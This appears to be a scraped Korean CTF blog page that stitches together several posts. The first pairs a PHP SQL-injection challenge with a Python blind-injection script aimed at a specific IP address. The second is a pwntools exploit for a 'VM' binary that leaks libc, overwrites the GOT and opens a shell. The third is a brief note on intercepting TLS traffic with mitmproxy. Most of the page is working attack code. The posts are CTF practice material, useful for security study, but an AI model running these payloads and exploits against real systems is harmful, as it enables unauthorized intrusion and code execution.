say2 :: say2

/*
 *      if you see the password column name,
 *      you will get the flag~!
 *
 */

include("./dbconfig.php");
$id = $_GET['id'];
$pw = $_GET['pw'];

if ( isset($id) || isset($pw) ) {
    if (preg_match("/info|sche|,/i", $id))
        exit("no hack ~_~");
    if (preg_match("/info|sche/i", $pw))
        exit("no hack ~_~");

    $query = "SELECT {$pw_column_name}, {$id_column_name} FROM {$table} WHERE {$id_column_name}='{$id}' AND {$pw_column_name}='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($conn ,$query));

    if ($result['id']) {
        echo "Hello {$result['id']}";
    } else {
        echo "DB error";
    }
} else {
    highlight_file(__FILE__);
}

import request
def hexor():
	param={'id':"123' union select 2,",'pw':"#"}
	password=''
	for ind in range(1,10):
		p=0
		for x in range(7,-1,-1):
			param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)}
			res=requests.get('http://13.124.1.51/web/prob15/?id=info',params=param).text
			if 'Hello guest' not in res:
				p+=2**x
		#print p
			print res
			#time.sleep(10000)
		print p
		print '[**]'+chr(p)
		password+=chr(p)
		print 'password: '+password
		
hexor()

'CTF' 카테고리의 다른 글

[codegate2018 final]place the blanket (0)	2018.04.07
[sha2017]megan-35 (0)	2017.08.07
[codegate2017]VM (0)	2017.07.25
[2017 googlectf] inst_prof (0)	2017.06.19
[0ctf qual]EasiestPrintf (0)	2017.05.25

fix ex

from pwn import *

def dump():
	return (0<<0x1c)|((3<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)
def setreg(ind,val):
	return (1<<0x1c)|((1<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)|val
def movreg(src,dest):
	#sangsu=(0<<0x1a)&0xc0000000
	return (1<<0x1c)|((0<<0x1a)&0xc000000)|((0xf<<16)&0xf0000|((dest<<0x17)&0x3800000))|((src<<0x14)&0x700000)
def pad(x):
	return hex(x)[2:].rjust(8,'0')
def push(ind,val):
	return (8<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)|val
def push_s(val):
	return (8<<0x1c)|((3<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|val
def xchg(r1,r2):
    return (5 << 0x1c)|(0 << 0x1a)|(r1 << 0x17)| (r2 << 0x14)|((0xf<<16)&0xf0000)
def pop(ind):
	return (9<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)
def sub(ind):
	return (7<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)
p=process('./VM')
print hex(movreg(6,0))
print hex(setreg(7,0x1234))
#p.sendline(pad(setreg(1,0x44d0)))
p.sendline(pad(setreg(7,0x4030-0x30+0x80))*0x20)
p.sendline(pad(dump()))
p.recvuntil('0x4070 ')
heapleak=int(p.recv(3)[:2],16)+0x100*int(p.recv(3)[:2],16)+0x10000*int(p.recv(3)[:2],16)+0x1000000*int(p.recv(3)[:2],16)
print hex(heapleak)
heapbase=heapleak-0x15cd0
log.info('heapbase : '+hex(heapbase))
p.sendline(pad(setreg(7,0x4000+0x470+0x60)))
p.sendline(pad(dump()))
p.recvuntil('0x44b0 ')
libcleak=int(p.recv(3)[:2],16)+0x100*int(p.recv(3)[:2],16)+0x10000*int(p.recv(3)[:2],16)+0x1000000*int(p.recv(3)[:2],16)+0x100000000*int(p.recv(3)[:2],16)+0x10000000000*int(p.recv(3)[:2],16)
libc=libcleak-0x3c4be8
reg_base=heapbase+0x11c20
log.info('libc : '+hex(libc))
overwrite_got=0x60c010#int(raw_input('>>'),16)#0x60c0f0#0x60c088#0x00000000060C198
begin=0x00000000060C188#0x7fe47110e000
system=libc+0x45390+0xabd87 # onegadget
log.info('system'+hex(system))
off=overwrite_got-reg_base+0x100000000-0x30+2
print 'off'+hex(off)
p.sendline(pad(setreg(0,off&0xffff)))
p.sendline(pad(setreg(7,0x4000+4)))
p.sendline(pad(push_s(off>>16)))

p.sendline(pad(setreg(7,0x4000)))
p.sendline(pad(xchg(0,7)))

#p.sendline(pad(dump()))
#p.interactive()
pay=''
pay+=pad(push_s(system&0xffff))
pay+=pad(pop(2))
pay+=pad(pop(2))

#p.sendline(pad(dump()))
#p.interactive()
print pad(pop(2))

print hex(0xffff&(system>>16))
pay+=pad(push_s((system>>16)&0xffff))
#p.sendline(pad(pop(2)))
pay+=pad(pop(2))
pay+=pad(pop(2))
pay+=pad(push_s(((system>>16)>>16)&0xffff))
pay+=pad(pop(2))
pay+=pad(pop(2))
pay+=pad(push_s((((system>>16)>>16)>>16)&0xffff))
pay+=pad(movreg(7,1))
for i in range(6):
	pay+=pad(sub(1))
pay+=pad(dump())
raw_input('>')
p.sendline(pay)

print 'one :'+hex(system)
#p.sendline('000f0000')
p.interactive()

'CTF' 카테고리의 다른 글

[sha2017]megan-35 (0)	2017.08.07
[H3XOR]column test (0)	2017.08.02
[2017 googlectf] inst_prof (0)	2017.06.19
[0ctf qual]EasiestPrintf (0)	2017.05.25
[codegate 17 final]BMP (0)	2017.05.14

SSL TLS까지 intercept가능..짱짱

i->inptercept option -> ~q : 모든 request 캡처

intercept한놈들 중에 하나 골라서 enter

receive할 데이터 edit

ssl , tls 를 막론하고

가능한데 facebook이나 몇몇 사이트들은 이 방법도 막아놨다고 한다.

원리는 mitmproxy의 인증서를 만들어서

중간에서 잘 처리해준다 ^ㅡ^

아래 manual에 잘 설명되어있다.

http://docs.mitmproxy.org/en/stable/howmitmproxy.html

say2

[H3XOR]column test

'CTF' 카테고리의 다른 글

[codegate2017]VM

'CTF' 카테고리의 다른 글

mitmproxy

+ Recent posts

티스토리툴바